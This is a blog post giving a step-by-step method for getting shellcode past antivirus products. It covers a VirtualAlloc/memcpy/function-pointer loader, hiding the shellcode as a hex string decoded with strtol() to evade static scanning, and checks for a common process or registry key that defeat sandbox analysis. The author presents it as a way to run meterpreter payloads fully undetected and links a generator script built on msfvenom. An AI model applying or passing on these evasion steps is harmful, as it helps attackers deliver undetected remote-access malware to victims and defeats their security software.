Bypassing antivirus the easy way

The theory on how to execute your shellcode from a c/c++ code . All of the this ways can be coded in python and with the pyinstaller + Cipher and Crypto lib you can have a fud shellcode exec in no time .  Anyway …

How can you execute shellcode in a system ?

  1. Allocate memory with -rwx permissions
  2. Copy the shellcode into this location
  3. Execute him
  4. $Profit

Of course between 1 and 2 (or 3?)you may need a decrypt function .

Here are some function you can use in linux/windows systems

  1. VirtualAlloc()
  2. memcpy()
  3. ((void(*)())addressOfVirtualAlloc)();

More on Github

How Anti-Virus (AV)  products work ?

When you submit a file for execution the AV performs static and dynamic analysis . Firstly , checks for already seen suspicious instructions or “strings” (check yara)in general and then executes the file in a sandbox . The sandbox have to be fast and do not consume many resources.

Many papers (take a look at the links provided at the end) exploit the above two facts and try to slow the app by creating huge memory allocations and many iterations. The problem is that even a simple user can understand that something is going wrong just by watching his task manager :/.

Trying to bypass the scanning

I was wondering how you could bypass antivirus by using only c++ (no python trickery 🙂 ) and not assembly. Also  , slowing the program execution was not a solution . We need something “stealthy”.

I had a bad habbit in python, I used to treat hex encoded bytes in python as strings ( use decode(‘hex’) ). So in c++ if I use strtol() I can do the exact same thing in order to “obfuscate” my shellcode (bypass static analysis) by converting it to string and then to bytes. Of course , we will use the capabilities of msfvenom to obfuscate our shellcode but is not actually needed !

By using strtol() we are able to bypass all major 32 AV products except from 3 as I can recall*. We can bypass 2 more just by adding a fake loadlibrary call but we still have one (Microsoft Security Essentials) left in order to be fud . After downloading MSE in my vm I started testing when the alert is triggered . After  some trial and error I found that the alert comes from the shellcode execution . So I had to find a way to bypass its sandbox .

What if I check if the process exists  ? Same thing again the sandbox blocks our access to watch the processes so the alert keeps popping up . And … here is the trick . We should not check if the process does not exist but if it exists !

screenshot-27

  1. Find a process that exists in many windows systems (explorer.exe,system.exe etc)
  2. Check if process exists
  3. Execute Shellcode
  4. Profit

Then is good to execute the code (remember ? we can bypass static analysis) .

W00t bypassed ! Now the infamous meterpreter shellcode can be executed 🙂

Ok ok you will say that you have to keep track of all AV products  processes

My tests showed that just by adding the strtol() and the process trick you can bypass all AV products even if you have a simple meterpreter payload .

There is more  – Same thing with registry

Replacing the process scenario with registry we can have exact same outcome . AV products hide registry when the file is scanned in the sandbox.

screenshot-26

  1. Find a default registry that exist in all windows platforms
  2. Check if the registry exists
  3. Execute shellcode
  4. Profit

Withought fake lib  NoDistribute

(Seems that 3/3/2017 ikarus av is detecting it right now but can be bypassed with a fake library NoDistribute (fud)

afterlibfakecall

With all of the above being sad I created a simple bash script that generates .cpp files with msfvenom . You have to compile it by yourself. GitHub

I hope that you found this article helpful . Please take a look at the papers below . They are really cool and they helped me to come to the above results 🙂

*Also NoDistribute must distribute the results because nothing could  catch the proc technique the  previous week and the use of strtol() before  :/

[1]https://dl.packetstormsecurity.net/papers/bypass/bypassing-av.pdf

[2]http://packetstorm.foofus.com/papers/virus/BypassAVDynamics.pdf ( Its a really good paper)

[3]https://www.exploit-db.com/docs/40900.pdf Also a worth reading paper

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s